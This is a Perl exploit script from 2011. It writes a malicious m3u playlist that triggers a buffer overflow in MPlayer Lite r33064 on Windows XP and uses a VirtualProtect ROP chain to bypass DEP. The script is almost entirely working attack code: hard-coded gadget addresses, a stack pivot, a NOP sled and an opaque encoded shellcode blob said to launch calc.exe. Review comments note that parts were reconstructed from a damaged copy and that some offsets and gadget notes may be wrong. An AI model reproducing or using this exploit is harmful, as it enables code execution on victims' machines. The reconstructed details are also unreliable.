Posted on 25 July 2011
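#!/usr/bin/perl
#
# [+] Exploit Title: MPlayer Lite r33064 m3u Buffer Overflow Exploit (DEP BYPASS)
# [+] Date: 24/7/2011
# [+] Author: C4SS!0 and h1ch4m
# [+] Software Link: http://sourceforge.net/projects/mplayer-ww/files/MPlayer_Release/Revision%2033064/mplayer_lite_r33064.7z/download
# [+] Version: Lite 33064
# [+] Tested On: WIN-XP SP3 x86 Brazilian Portuguese
# [+] CVE: N/A
#
# Created BY C4SS!0 G0M3S
# E-mail Louredo_@hotmail.com
# Site net-fuzzer.blogspot.com
#
# Proof-of-concept generator.  Running it writes a playlist file,
# Exploit.m3u, whose entry is an oversized "http://" URL carrying a ROP
# chain (VirtualProtect via the PUSHAD # RETN technique) followed by a
# payload.  Opening the playlist in the affected build is what triggers
# the overflow; this script itself only writes the file.
#
# Practitioner notes:
#   * Every address in the chain is hard-coded for the modules shipped with
#     MPlayer Lite r33064 on WinXP SP3 x86, the only configuration listed
#     as tested.  It will not transfer to other builds or OS versions.
#   * The shellcode is an opaque encoded blob; the original comment says it
#     runs WinExec "Calc.exe".  Nothing in this file verifies that claim --
#     disassemble it or run it in a sandbox before trusting it.
#   * NOTE(review): this copy of the listing was recovered from an HTML
#     rendering in which every "\x" escape had lost its backslash ("xdb"
#     instead of "\xdb") and the newlines inside string literals were
#     collapsed to spaces.  The escapes and newlines below are restored on
#     that basis.  The separator between "http://" and the payload in the
#     playlist entry is the one place where this is a guess (see the write
#     at the bottom) -- check it against the original listing before
#     depending on the offsets.

use strict;
use warnings;
use IO::File;    # unused; kept from the original listing

print q{
Created BY C4SS!0 G0M3S
Site net-fuzzer.blogspot.com
E-mail Louredo_@hotmail.com
};
sleep(2);

# --- layout (all offsets are relative to the start of $buf) -----------------
my $OUTFILE     = 'Exploit.m3u';
my $ROP_OFFSET  = 4496 - 12;   # filler before the ROP chain (4484 bytes)
my $PIVOT_OFFSET = 5152;       # 4-byte short jump, then the stack-pivot gadget
my $NOPS_BEFORE = 10;          # sled between the chain and the shellcode
my $NOPS_AFTER  = 400;         # trailing sled

# --- payload -----------------------------------------------------------------
# Shellcode WinExec "Calc.exe" (per the original comment; 144 bytes, encoded)
# Badchars "\x00\x20\x0d\x0a"
my $shellcode =
    "\xdb\xc0\x31\xc9\xbf\x7c\x16\x70\xcc\xd9\x74\x24\xf4\xb1" .
    "\x1e\x58\x31\x78\x18\x83\xe8\xfc\x03\x78\x68\xf4\x85\x30" .
    "\x78\xbc\x65\xc9\x78\xb6\x23\xf5\xf3\xb4\xae\x7d\x02\xaa" .
    "\x3a\x32\x1c\xbf\x62\xed\x1d\x54\xd5\x66\x29\x21\xe7\x96" .
    "\x60\xf5\x71\xca\x06\x35\xf5\x14\xc7\x7c\xfb\x1b\x05\x6b" .
    "\xf0\x27\xdd\x48\xfd\x22\x38\x1b\xa2\xe8\xc3\xf7\x3b\x7a" .
    "\xcf\x4c\x4f\x23\xd3\x53\xa4\x57\xf7\xd8\x3b\x83\x8e\x83" .
    "\x1f\x57\x53\x64\x51\xa1\x33\xcd\xf5\xc6\xf5\xc1\x7e\x98" .
    "\xf5\xaa\xf1\x05\xa8\x26\x99\x3d\x3b\xc0\xd9\xfe\x51\x61" .
    "\xb6\x0e\x2f\x85\x19\x87\xb7\x78\x2f\x59\x90\x7b\xd7\x05" .
    "\x7f\xe8\x7b\xca";

# --- ROP chain ---------------------------------------------------------------
# Reading the gadget comments: the overwritten pointer goes to a stack pivot
# (ADD ESP,17CC # POP EBX # POP ESI # POP EDI # POP EBP # RETN).  If that
# pivot lands exactly at the start of $rop, its four pops consume the first
# four dwords, leaving EDI = "POP EDI # RETN" and EBP = the VirtualProtect
# address.  The remaining gadgets stage registers for PUSHAD # RETN:
# EBX = current ESP (lpAddress), EDX = size, ECX = 0x40 (flNewProtect),
# EAX = some address for lpOldProtect.  After PUSHAD the RETN lands on the
# EDI gadget, which eats the ESI slot and returns into EBP (VirtualProtect);
# VirtualProtect then returns onto the pushed ESP value, i.e. the NOP sled
# and shellcode that follow the chain.
# NOTE(review): this walk-through is reconstructed from the comments alone.
# It assumes 0x6D7CBBE4 is directly executable (a thunk into VirtualProtect
# rather than a bare IAT slot), which the listing does not show.  The
# "ADD AH,BL" gadget is annotated "BL = 01", but the POP EBX just before it
# loads 0x42424202, so BL is 0x02 there; with MOV EAX,40 and two ADD AL,89
# the size argument then works out to 0x252 -- confirm in a debugger.
my $rop = '';
$rop .= "BBBB";                    # -> EBX via the pivot's pop (junk)
$rop .= "CCCD";                    # -> ESI via the pivot's pop (junk)
$rop .= pack('V', 0x6496E0BB);     # -> EDI: POP EDI # RETN
$rop .= pack('V', 0x6D7CBBE4);     # -> EBP: Address to kernel32.VirtualProtect
############################## ROP EXPLOIT ##############################
$rop .= pack('V', 0x649abc7b);     # PUSH ESP # POP EBX # POP ESI # RETN
$rop .= "BBBB";                    # Junk (popped into ESI)
$rop .= pack('V', 0x6B0402A9);     # MOV EAX,EBX # POP EBX # RETN
$rop .= "\x01\x42\x42\x42";        # Junk (popped into EBX)
$rop .= pack('V', 0x6AED7BAF);     # POP ECX # RETN
$rop .= "\xff\xff\xff\xff";        # ECX = -1; the INC ECX below makes it 0
$rop .= pack('V', 0x6AD85749);     # POP EBX # RETN
$rop .= "\x40\x40\x40\x40";        # BL = 0x40
$rop .= pack('V', 0x6ADB3A50);     # INC ECX # ADD AL,5B # RETN
$rop .= pack('V', 0x6ae00bf0);     # ADD CL,BL # RETN  -> ECX = 0x40
$rop .= pack('V', 0x6AD85749);     # POP EBX # RETN
$rop .= "\x02\x42\x42\x42";        # BL = 0x02
$rop .= pack('V', 0x6afa6dd8);     # MOV EAX,40 # RETN
$rop .= pack('V', 0x6b0817a0);     # ADD AL,89 # RETN
$rop .= pack('V', 0x6b0817a0);     # ADD AL,89 # RETN
$rop .= pack('V', 0x6ADA31E1);     # ADD AH,BL # RETN  (original note: "BL = 01")
$rop .= pack('V', 0x6B0B7A46);     # MOV EDX,EAX # MOV EAX,EDX # RETN
$rop .= pack('V', 0x649abc7b);     # PUSH ESP # POP EBX # POP ESI # RETN
$rop .= "GGGG";                    # Junk (popped into ESI)
$rop .= pack('V', 0x6B0B7A46);     # MOV EDX,EAX # MOV EAX,EDX # RETN
$rop .= pack('V', 0x64975830);     # POP EAX # RETN
$rop .= pack('V', 0x64975918);     # EAX = presumably a writable address for lpOldProtect
$rop .= pack('V', 0x649B11EC);     # PUSHAD # RETN
############################## ROP END HERE #############################

# --- buffer ------------------------------------------------------------------
my $buf = "\x41" x $ROP_OFFSET;
$buf .= $rop;
$buf .= ("\x90" x $NOPS_BEFORE) . $shellcode;   # You have a good space for shellcode here :)

# Guard: the "x" operator silently yields "" for a negative count, so a
# larger replacement shellcode would push the pivot off its offset with no
# error at all.  Fail loudly instead.
if (length($buf) > $PIVOT_OFFSET) {
    die sprintf("**[x]Error: payload ends at %d, past the %d-byte pivot offset\n",
                length($buf), $PIVOT_OFFSET);
}

$buf .= "\x41" x ($PIVOT_OFFSET - length($buf));
# Laid out like an nSEH/SEH pair (short jump + int3 padding, then the
# handler); the listing does not say whether the overwritten pointer is an
# SEH record or a plain return address.
$buf .= "\xeb\x0f\xcc\xcc";
$buf .= pack('V', 0x6497ab0c);     # ADD ESP,17CC # POP EBX # POP ESI # POP EDI # POP EBP # RETN
$buf .= "\x90" x $NOPS_AFTER;

# --- output ------------------------------------------------------------------
print "\n[+]Creating M3U File...\n";
sleep(1);

# Three-arg open, binary mode (no CRLF translation on Windows: the payload
# must reach disk byte-for-byte), and a checked close, since buffered write
# errors only surface at close.
open(my $fh, '>', $OUTFILE) or die "**[x]Error: $!\n";
binmode($fh);
# NOTE(review): the newline after "http://" is reconstructed, see header.
print {$fh} "http://\n" . $buf;
close($fh) or die "**[x]Error: $!\n";

print "\n[+]File $OUTFILE Created with Success\n";
sleep(1);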
